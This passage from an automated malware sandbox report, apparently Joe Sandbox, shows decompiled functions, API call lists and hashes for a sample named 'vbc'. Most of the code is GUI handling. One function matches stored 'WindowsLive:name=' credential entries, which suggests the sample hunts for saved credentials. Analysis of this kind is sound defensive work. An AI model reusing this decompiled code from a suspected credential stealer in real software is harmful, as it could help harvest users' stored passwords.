                                                                                                                                                                        0x0040df47
                                                                                                                                                                        0x0040df3c

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00406282: GetVersionExA.KERNEL32(00418118,0000001A,0040F4E8,00000104), ref: 0040629C
                                                                                                                                                                        • memset.MSVCRT ref: 0040DF75
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040DF8C
                                                                                                                                                                        • _strnicmp.MSVCRT ref: 0040DFA6
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040DFD2
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040DFF2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                        • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                        • API String ID: 945165440-3589380929
                                                                                                                                                                        • Opcode ID: 30eab080ff57603f0c83065378de1aa9d50d3c7817c6219040755b9d083dbe28
                                                                                                                                                                        • Instruction ID: faca0abe0adb4f8b424a3cc142a11908341e250f8e36283e96c9ece6c5c035f0
                                                                                                                                                                        • Opcode Fuzzy Hash: 30eab080ff57603f0c83065378de1aa9d50d3c7817c6219040755b9d083dbe28
                                                                                                                                                                        • Instruction Fuzzy Hash: 14419FB1508345AFC320DF15D8848ABBBECEB84344F00493EF999A2291D734ED48CB66
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00408155 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 78%
                                                                                                                                                                        			E00408155(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v259;
				char _v260;
				void _v4359;
				char _v4360;
				int _t17;
				CHAR* _t26;

				E00412360(0x1104, __ecx);
				_v4360 = 0;
				memset( &_v4359, 0, 0x1000);
				_t17 = GetDlgCtrlID(_a4);
				_t35 = _t17;
				GetWindowTextA(_a4,  &_v4360, 0x1000);
				if(_t17 > 0 && _v4360 != 0) {
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					GetClassNameA(_a4,  &_v260, 0xff);
					_t26 =  &_v260;
					_push("sysdatetimepick32");
					_push(_t26);
					L00412072();
					if(_t26 != 0) {
						E0040802D(_t35,  &_v4360);
					}
				}
				return 1;
			}









                                                                                                                                                                        0x0040815d
                                                                                                                                                                        0x00408175
                                                                                                                                                                        0x0040817b
                                                                                                                                                                        0x00408186
                                                                                                                                                                        0x0040818c
                                                                                                                                                                        0x00408199
                                                                                                                                                                        0x004081a1
                                                                                                                                                                        0x004081b9
                                                                                                                                                                        0x004081bf
                                                                                                                                                                        0x004081d2
                                                                                                                                                                        0x004081d8
                                                                                                                                                                        0x004081de
                                                                                                                                                                        0x004081e3
                                                                                                                                                                        0x004081e4
                                                                                                                                                                        0x004081ed
                                                                                                                                                                        0x004081f7
                                                                                                                                                                        0x004081fd
                                                                                                                                                                        0x004081ed
                                                                                                                                                                        0x00408205

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040817B
                                                                                                                                                                        • GetDlgCtrlID.USER32 ref: 00408186
                                                                                                                                                                        • GetWindowTextA.USER32 ref: 00408199
                                                                                                                                                                        • memset.MSVCRT ref: 004081BF
                                                                                                                                                                        • GetClassNameA.USER32(?,?,000000FF), ref: 004081D2
                                                                                                                                                                        • _stricmp.MSVCRT(?,sysdatetimepick32), ref: 004081E4
                                                                                                                                                                          • Part of subcall function 0040802D: _itoa.MSVCRT ref: 0040804E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$ClassCtrlNameTextWindow_itoa_stricmp
                                                                                                                                                                        • String ID: sysdatetimepick32
                                                                                                                                                                        • API String ID: 896699463-4169760276
                                                                                                                                                                        • Opcode ID: a7e83458ae8ab176729b938156b1736a97d8aa9ca8d765e96f30c653e7aaea31
                                                                                                                                                                        • Instruction ID: 8ec491919e3a594e32bcc0b3aeb202d37a515ee6f0006301200e52d8450d0196
                                                                                                                                                                        • Opcode Fuzzy Hash: a7e83458ae8ab176729b938156b1736a97d8aa9ca8d765e96f30c653e7aaea31
                                                                                                                                                                        • Instruction Fuzzy Hash: 2311EC7280511C7EE7119B54DD41EEB7BACEF19355F0400BBFA44E2152EA789FC48B68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040571F Relevance: 12.2, APIs: 8, Instructions: 196windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 98%
                                                                                                                                                                        			E0040571F(signed int __ecx, intOrPtr _a4, unsigned int _a8, intOrPtr* _a12) {
				signed int _v8;
				intOrPtr _v16;
				void* __esi;
				void* _t74;
				void* _t75;
				signed int _t76;
				signed int _t89;
				signed int _t90;
				void* _t98;
				void* _t101;
				short* _t118;
				unsigned int _t126;
				intOrPtr _t128;
				signed int _t131;
				void* _t144;
				intOrPtr* _t146;
				short _t153;
				signed int _t155;

				_t129 = __ecx;
				_push(__ecx);
				_t74 = _a4 - 0x4e;
				_t155 = __ecx;
				if(_t74 == 0) {
					_t146 = _a12;
					__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xfffffffd;
					if( *((intOrPtr*)(_t146 + 8)) == 0xfffffffd) {
						__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
						if(__eflags == 0) {
							E00404D4C(__eflags,  *_t146,  *(_t146 + 0xc));
						}
					}
					__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xffffff9b;
					if( *((intOrPtr*)(_t146 + 8)) != 0xffffff9b) {
						L27:
						_t75 = 0;
						__eflags = 0;
						goto L28;
					} else {
						__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
						if( *((intOrPtr*)(_t146 + 4)) != 0x3e9) {
							goto L27;
						}
						_t76 =  *(_t146 + 0x14);
						__eflags = _t76 & 0x00000002;
						if((_t76 & 0x00000002) == 0) {
							L36:
							_t131 =  *(_t146 + 0x18) ^ _t76;
							__eflags = 0x0000f000 & _t131;
							if((0x0000f000 & _t131) == 0) {
								L39:
								__eflags =  *(_t146 + 0x14) & 0x00000002;
								if(( *(_t146 + 0x14) & 0x00000002) == 0) {
									goto L27;
								}
								__eflags =  *(_t146 + 0x18) & 0x00000002;
								if(( *(_t146 + 0x18) & 0x00000002) != 0) {
									goto L27;
								}
								__eflags =  *(_t146 + 0xc);
								E00401413(_t155, 0x3eb, 0 |  *(_t146 + 0xc) != 0x00000000);
								__eflags =  *(_t146 + 0xc) -  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 1;
								E00401413(_t155, 0x3ec, 0 |  *(_t146 + 0xc) !=  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 0x00000001);
								 *((intOrPtr*)(_t155 + 0x14)) = 1;
								SetDlgItemInt( *(_t155 + 4), 0x3ed,  *( *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) +  *(_t146 + 0x28) * 4), 0);
								 *((intOrPtr*)(_t155 + 0x14)) = 0;
								_t75 = 1;
								L28:
								return _t75;
							}
							L37:
							_t89 = E004048E6( *_t146,  *(_t146 + 0xc), 0xf002);
							__eflags = _t89 & 0x00000002;
							if((_t89 & 0x00000002) != 0) {
								_t90 = _t89 & 0x0000f000;
								__eflags = _t90 - 0x1000;
								_v8 = _t90;
								E00401413(_t155, 0x3ee, 0 | _t90 == 0x00001000);
								_v16 - 0x2000 = _v16 == 0x2000;
								E00401413(_t155, 0x3ef, 0 | _v16 == 0x00002000);
							}
							goto L39;
						}
						__eflags =  *(_t146 + 0x18) & 0x00000002;
						if(( *(_t146 + 0x18) & 0x00000002) == 0) {
							goto L37;
						}
						goto L36;
					}
				}
				_t98 = _t74 - 0xc2;
				if(_t98 == 0) {
					SendDlgItemMessageA( *(__ecx + 4), 0x3ed, 0xc5, 3, 0);
					E004055A9(_t155);
					goto L27;
				}
				_t101 = _t98 - 1;
				if(_t101 != 0) {
					goto L27;
				}
				_t126 = _a8 >> 0x10;
				if( *((intOrPtr*)(__ecx + 0x14)) != _t101 || _t126 != 0x300) {
					L7:
					if(_t126 != 0) {
						goto L27;
					}
					if(_a8 != 0x3f0) {
						L13:
						if(_a8 == 0x3eb) {
							E00404B3F(GetDlgItem( *(_t155 + 4), 0x3e9), _t129);
						}
						if(_a8 == 0x3ec) {
							E00404B82(GetDlgItem( *(_t155 + 4), 0x3e9));
						}
						if(_a8 == 0x3ee) {
							E00404BBE(GetDlgItem( *(_t155 + 4), 0x3e9), 1);
						}
						if(_a8 == 0x3ef) {
							E00404BBE(GetDlgItem( *(_t155 + 4), 0x3e9), 0);
						}
						if(_a8 == 2) {
							EndDialog( *(_t155 + 4), 2);
						}
						if(_a8 == 1) {
							E00405542(_t155);
							EndDialog( *(_t155 + 4), 1);
						}
						_t75 = 1;
						goto L28;
					}
					_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4));
					_t129 = 0;
					if(_t128 <= 0) {
						L12:
						E004055A9(_t155);
						goto L13;
					}
					_t144 = 0;
					do {
						_t118 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) + _t129 * 4;
						 *(_t118 + 2) = _t129;
						_t153 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0x10)) + _t144 + 0xc));
						_t129 = _t129 + 1;
						_t144 = _t144 + 0x14;
						 *_t118 = _t153;
					} while (_t129 < _t128);
					goto L12;
				} else {
					if(_a8 != 0x3ed) {
						goto L27;
					} else {
						E004054D0(__ecx, __ecx);
						goto L7;
					}
				}
			}





















                                                                                                                                                                        0x0040571f
                                                                                                                                                                        0x00405725
                                                                                                                                                                        0x00405729
                                                                                                                                                                        0x0040572f
                                                                                                                                                                        0x00405731
                                                                                                                                                                        0x00405865
                                                                                                                                                                        0x00405868
                                                                                                                                                                        0x00405871
                                                                                                                                                                        0x00405873
                                                                                                                                                                        0x00405876
                                                                                                                                                                        0x0040587d
                                                                                                                                                                        0x00405883
                                                                                                                                                                        0x00405876
                                                                                                                                                                        0x00405884
                                                                                                                                                                        0x00405888
                                                                                                                                                                        0x0040585a
                                                                                                                                                                        0x0040585a
                                                                                                                                                                        0x0040585a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040588a
                                                                                                                                                                        0x0040588a
                                                                                                                                                                        0x0040588d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040588f
                                                                                                                                                                        0x00405892
                                                                                                                                                                        0x00405899
                                                                                                                                                                        0x004058a1
                                                                                                                                                                        0x004058a4
                                                                                                                                                                        0x004058a6
                                                                                                                                                                        0x004058a8
                                                                                                                                                                        0x004058f7
                                                                                                                                                                        0x004058f7
                                                                                                                                                                        0x004058fb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405901
                                                                                                                                                                        0x00405905
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040590f
                                                                                                                                                                        0x0040591d
                                                                                                                                                                        0x0040592b
                                                                                                                                                                        0x00405939
                                                                                                                                                                        0x00405957
                                                                                                                                                                        0x0040595a
                                                                                                                                                                        0x00405960
                                                                                                                                                                        0x00405963
                                                                                                                                                                        0x0040585c
                                                                                                                                                                        0x00405862
                                                                                                                                                                        0x00405862
                                                                                                                                                                        0x004058aa
                                                                                                                                                                        0x004058b4
                                                                                                                                                                        0x004058bc
                                                                                                                                                                        0x004058be
                                                                                                                                                                        0x004058c0
                                                                                                                                                                        0x004058c4
                                                                                                                                                                        0x004058cc
                                                                                                                                                                        0x004058d8
                                                                                                                                                                        0x004058e7
                                                                                                                                                                        0x004058f2
                                                                                                                                                                        0x004058f2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004058be
                                                                                                                                                                        0x0040589b
                                                                                                                                                                        0x0040589f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040589f
                                                                                                                                                                        0x00405888
                                                                                                                                                                        0x00405737
                                                                                                                                                                        0x0040573c
                                                                                                                                                                        0x0040584e
                                                                                                                                                                        0x00405855
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405855
                                                                                                                                                                        0x00405742
                                                                                                                                                                        0x00405743
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040574c
                                                                                                                                                                        0x00405752
                                                                                                                                                                        0x0040576c
                                                                                                                                                                        0x0040576f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040577b
                                                                                                                                                                        0x004057b0
                                                                                                                                                                        0x004057c1
                                                                                                                                                                        0x004057c9
                                                                                                                                                                        0x004057c9
                                                                                                                                                                        0x004057d4
                                                                                                                                                                        0x004057dc
                                                                                                                                                                        0x004057dc
                                                                                                                                                                        0x004057e7
                                                                                                                                                                        0x004057f2
                                                                                                                                                                        0x004057f8
                                                                                                                                                                        0x004057ff
                                                                                                                                                                        0x0040580a
                                                                                                                                                                        0x00405810
                                                                                                                                                                        0x0040581c
                                                                                                                                                                        0x00405823
                                                                                                                                                                        0x00405823
                                                                                                                                                                        0x0040582a
                                                                                                                                                                        0x0040582c
                                                                                                                                                                        0x00405836
                                                                                                                                                                        0x00405836
                                                                                                                                                                        0x0040583a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040583a
                                                                                                                                                                        0x00405780
                                                                                                                                                                        0x00405783
                                                                                                                                                                        0x00405787
                                                                                                                                                                        0x004057aa
                                                                                                                                                                        0x004057ab
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004057ab
                                                                                                                                                                        0x00405789
                                                                                                                                                                        0x0040578b
                                                                                                                                                                        0x00405790
                                                                                                                                                                        0x00405793
                                                                                                                                                                        0x0040579a
                                                                                                                                                                        0x0040579f
                                                                                                                                                                        0x004057a0
                                                                                                                                                                        0x004057a5
                                                                                                                                                                        0x004057a5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040575b
                                                                                                                                                                        0x00405761
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405767
                                                                                                                                                                        0x00405767
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405767
                                                                                                                                                                        0x00405761

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDlgItem.USER32 ref: 004057C7
                                                                                                                                                                        • GetDlgItem.USER32 ref: 004057DA
                                                                                                                                                                        • GetDlgItem.USER32 ref: 004057EF
                                                                                                                                                                        • GetDlgItem.USER32 ref: 00405807
                                                                                                                                                                        • EndDialog.USER32(?,00000002), ref: 00405823
                                                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 00405836
                                                                                                                                                                          • Part of subcall function 004054D0: GetDlgItem.USER32 ref: 004054DE
                                                                                                                                                                          • Part of subcall function 004054D0: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 004054F3
                                                                                                                                                                          • Part of subcall function 004054D0: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 0040550F
                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 0040584E
                                                                                                                                                                        • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 0040595A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Item$DialogMessageSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2485852401-0
                                                                                                                                                                        • Opcode ID: f7827bcec6ef5800e0abba1fd027fbe4bcd8fe50388742f33dd21846a4c000d1
                                                                                                                                                                        • Instruction ID: 327bdf07108b1d48d13abdf232bd1ccce71b7be96730af3de4981d1ea2c32abc
                                                                                                                                                                        • Opcode Fuzzy Hash: f7827bcec6ef5800e0abba1fd027fbe4bcd8fe50388742f33dd21846a4c000d1
                                                                                                                                                                        • Instruction Fuzzy Hash: 6561C031600A05AFDB25BF25C886A2BB3A5FF40725F00C23EF915A72D1D778A960CF49
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040596A Relevance: 12.1, APIs: 8, Instructions: 103windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                        			E0040596A(void** __eax, void* __edi, intOrPtr _a4, struct HWND__* _a8) {
				RECT* _v8;
				void* __esi;
				void* _t39;
				signed int _t41;
				void* _t42;
				struct HWND__* _t47;
				signed int _t53;
				void* _t54;
				signed int _t76;
				signed int _t78;
				void* _t80;
				void** _t82;
				signed int _t86;
				void* _t90;
				signed int _t91;

				_t80 = __edi;
				_push(_t58);
				_push(0xc);
				_v8 = 0;
				 *((intOrPtr*)(__edi + 0x10)) = __eax;
				L00412090();
				if(__eax == 0) {
					_t82 = 0;
				} else {
					 *((intOrPtr*)(__eax)) = 0;
					_t82 = __eax;
				}
				 *(_t80 + 0xc) = _t82;
				_t39 =  *_t82;
				_t90 = _t39;
				if(_t90 != 0) {
					_push(_t39);
					L00412096();
					 *_t82 = 0;
				}
				_t82[2] = _a8;
				_t41 = E00404A05(_a8);
				_t76 = 4;
				_t82[1] = _t41;
				_t42 = _t41 * _t76;
				_push( ~(0 | _t90 > 0x00000000) | _t42);
				L00412090();
				 *_t82 = _t42;
				memset(_t42, 0, _t82[1] << 2);
				E004085AB( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
				_t91 =  *(_t80 + 0x10);
				if(_t91 == 0) {
					_t86 = ( *(_t80 + 0xc))[1];
					_t78 = 0x14;
					_t53 = _t86 * _t78;
					_push( ~(0 | _t91 > 0x00000000) | _t53);
					L00412090();
					 *(_t80 + 0x10) = _t53;
					if(_t86 > 0) {
						_t54 = 0;
						do {
							 *((intOrPtr*)(_t54 +  *(_t80 + 0x10) + 0xc)) = 0x78;
							_t54 = _t54 + 0x14;
							_t86 = _t86 - 1;
						} while (_t86 != 0);
					}
					_v8 = 1;
				}
				if(E004014EA(0x448, _t80, _a4) == 1) {
					E0040851B( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
					InvalidateRect(( *(_t80 + 0xc))[2], 0, 0);
				}
				_t47 = SetFocus(_a8);
				if(_v8 != 0) {
					_push( *(_t80 + 0x10));
					L00412096();
				}
				return _t47;
			}


















                                                                                                                                                                        0x0040596a
                                                                                                                                                                        0x0040596e
                                                                                                                                                                        0x00405973
                                                                                                                                                                        0x00405975
                                                                                                                                                                        0x00405978
                                                                                                                                                                        0x0040597b
                                                                                                                                                                        0x00405983
                                                                                                                                                                        0x0040598b
                                                                                                                                                                        0x00405985
                                                                                                                                                                        0x00405985
                                                                                                                                                                        0x00405987
                                                                                                                                                                        0x00405987
                                                                                                                                                                        0x0040598d
                                                                                                                                                                        0x00405990
                                                                                                                                                                        0x00405992
                                                                                                                                                                        0x00405994
                                                                                                                                                                        0x00405996
                                                                                                                                                                        0x00405997
                                                                                                                                                                        0x0040599d
                                                                                                                                                                        0x0040599d
                                                                                                                                                                        0x004059a3
                                                                                                                                                                        0x004059a6
                                                                                                                                                                        0x004059b0
                                                                                                                                                                        0x004059b1
                                                                                                                                                                        0x004059b4
                                                                                                                                                                        0x004059bd
                                                                                                                                                                        0x004059be
                                                                                                                                                                        0x004059cd
                                                                                                                                                                        0x004059cf
                                                                                                                                                                        0x004059dd
                                                                                                                                                                        0x004059e2
                                                                                                                                                                        0x004059e5
                                                                                                                                                                        0x004059ea
                                                                                                                                                                        0x004059f1
                                                                                                                                                                        0x004059f4
                                                                                                                                                                        0x004059fd
                                                                                                                                                                        0x004059fe
                                                                                                                                                                        0x00405a06
                                                                                                                                                                        0x00405a09
                                                                                                                                                                        0x00405a0b
                                                                                                                                                                        0x00405a0d
                                                                                                                                                                        0x00405a10
                                                                                                                                                                        0x00405a18
                                                                                                                                                                        0x00405a1b
                                                                                                                                                                        0x00405a1b
                                                                                                                                                                        0x00405a0d
                                                                                                                                                                        0x00405a1e
                                                                                                                                                                        0x00405a1e
                                                                                                                                                                        0x00405a36
                                                                                                                                                                        0x00405a3e
                                                                                                                                                                        0x00405a4b
                                                                                                                                                                        0x00405a4b
                                                                                                                                                                        0x00405a54
                                                                                                                                                                        0x00405a5d
                                                                                                                                                                        0x00405a5f
                                                                                                                                                                        0x00405a62
                                                                                                                                                                        0x00405a67
                                                                                                                                                                        0x00405a6b

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2313361498-0
                                                                                                                                                                        • Opcode ID: a580d9142bc32eaab65664efd4de07b17d343628356770d299779b1e7220968e
                                                                                                                                                                        • Instruction ID: c9d5e52e17e49b2fdf2665c470f327c4663aeb176fcf1135955ad165868745cd
                                                                                                                                                                        • Opcode Fuzzy Hash: a580d9142bc32eaab65664efd4de07b17d343628356770d299779b1e7220968e
                                                                                                                                                                        • Instruction Fuzzy Hash: 113183B2600601AFDB249F79D985A2AF7A4FB08354710863FF55AD7290DB78AC50CF58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040A7B2 Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040A7B2(void* __esi) {
				struct HDWP__* _v8;
				int _v12;
				intOrPtr _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _t32;
				int _t60;
				int _t65;

				if( *((intOrPtr*)(__esi + 0x124)) != 0) {
					GetClientRect( *(__esi + 0x108),  &_v32);
					GetWindowRect( *(__esi + 0x114),  &_v48);
					_t65 = _v48.bottom - _v48.top + 1;
					GetWindowRect( *(__esi + 0x118),  &_v48);
					_v12 = _v32.right - _v32.left;
					_t60 = _v48.bottom - _v48.top + 1;
					_v16 = _v32.bottom - _v32.top;
					_v8 = BeginDeferWindowPos(3);
					DeferWindowPos(_v8,  *(__esi + 0x118), 0, 0, 0, _v12, _t60, 4);
					DeferWindowPos(_v8,  *(__esi + 0x114), 0, 0, _v32.bottom - _t65 + 1, _v12, _t65, 6);
					DeferWindowPos(_v8,  *( *((intOrPtr*)(__esi + 0x370)) + 0x184), 0, 0, _t60, _v12, _v16 - _t60 - _t65, 4);
					return EndDeferWindowPos(_v8);
				}
				return _t32;
			}











                                                                                                                                                                        0x0040a7bf
                                                                                                                                                                        0x0040a7d1
                                                                                                                                                                        0x0040a7e7
                                                                                                                                                                        0x0040a7f9
                                                                                                                                                                        0x0040a7fa
                                                                                                                                                                        0x0040a808
                                                                                                                                                                        0x0040a813
                                                                                                                                                                        0x0040a814
                                                                                                                                                                        0x0040a823
                                                                                                                                                                        0x0040a834
                                                                                                                                                                        0x0040a854
                                                                                                                                                                        0x0040a87b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040a88b
                                                                                                                                                                        0x0040a88d

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetClientRect.USER32 ref: 0040A7D1
                                                                                                                                                                        • GetWindowRect.USER32 ref: 0040A7E7
                                                                                                                                                                        • GetWindowRect.USER32 ref: 0040A7FA
                                                                                                                                                                        • BeginDeferWindowPos.USER32 ref: 0040A817
                                                                                                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A834
                                                                                                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A854
                                                                                                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040A87B
                                                                                                                                                                        • EndDeferWindowPos.USER32(?), ref: 0040A884
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2126104762-0
                                                                                                                                                                        • Opcode ID: e3d9293826481cef379b2e174ab533f7da62d5a41b3e9301ba56b14c5600b15e
                                                                                                                                                                        • Instruction ID: 09cbeee5e8014f0efd252c30326660bc7ddd54a992e069e65e32613af5811a3b
                                                                                                                                                                        • Opcode Fuzzy Hash: e3d9293826481cef379b2e174ab533f7da62d5a41b3e9301ba56b14c5600b15e
                                                                                                                                                                        • Instruction Fuzzy Hash: AF21C871A00209FFDB11DFA8DD89FEEBBB9FB08311F104465FA55A2160CA71AA519B24
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040649B Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                        			E0040649B(void* __edx, struct HWND__* _a4) {
				struct HDC__* _v12;
				struct tagRECT _v28;
				struct HDC__* _t19;
				signed int _t32;
				int _t33;
				int _t35;
				int _t37;
				void* _t38;
				int _t39;
				intOrPtr _t40;
				intOrPtr _t45;

				_t38 = __edx;
				_t35 = GetSystemMetrics(0x11);
				_t39 = GetSystemMetrics(0x10);
				if(_t35 == 0 || _t39 == 0) {
					_t19 = GetDC(0);
					_v12 = _t19;
					_t39 = GetDeviceCaps(_t19, 8);
					_t35 = GetDeviceCaps(_v12, 0xa);
					ReleaseDC(0, _v12);
				}
				GetWindowRect(_a4,  &_v28);
				_t45 = _v28.right;
				_t40 = _v28.bottom;
				asm("cdq");
				asm("cdq");
				_t32 = _v28.top - _t40 + _t35 - 1 - _t38;
				_t37 = _v28.left - _t45 + _t39 - 1 - _t38 >> 1;
				_t33 = _t32 >> 1;
				if(_t32 < 0) {
					_t33 = 0;
				}
				if(_t37 < 0) {
					_t37 = 0;
				}
				return MoveWindow(_a4, _t37, _t33, _t45 - _v28.left + 1, _t40 - _v28.top + 1, 1);
			}














                                                                                                                                                                        0x0040649b
                                                                                                                                                                        0x004064b0
                                                                                                                                                                        0x004064b6
                                                                                                                                                                        0x004064b8
                                                                                                                                                                        0x004064c0
                                                                                                                                                                        0x004064cf
                                                                                                                                                                        0x004064d9
                                                                                                                                                                        0x004064e0
                                                                                                                                                                        0x004064e4
                                                                                                                                                                        0x004064e4
                                                                                                                                                                        0x004064f1
                                                                                                                                                                        0x004064fa
                                                                                                                                                                        0x00406503
                                                                                                                                                                        0x00406506
                                                                                                                                                                        0x00406514
                                                                                                                                                                        0x00406515
                                                                                                                                                                        0x00406517
                                                                                                                                                                        0x00406519
                                                                                                                                                                        0x0040651b
                                                                                                                                                                        0x0040651d
                                                                                                                                                                        0x0040651d
                                                                                                                                                                        0x00406521
                                                                                                                                                                        0x00406523
                                                                                                                                                                        0x00406523
                                                                                                                                                                        0x00406540

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetSystemMetrics.USER32 ref: 004064AC
                                                                                                                                                                        • GetSystemMetrics.USER32 ref: 004064B2
                                                                                                                                                                        • GetDC.USER32(00000000), ref: 004064C0
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 004064D2
                                                                                                                                                                        • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 004064DB
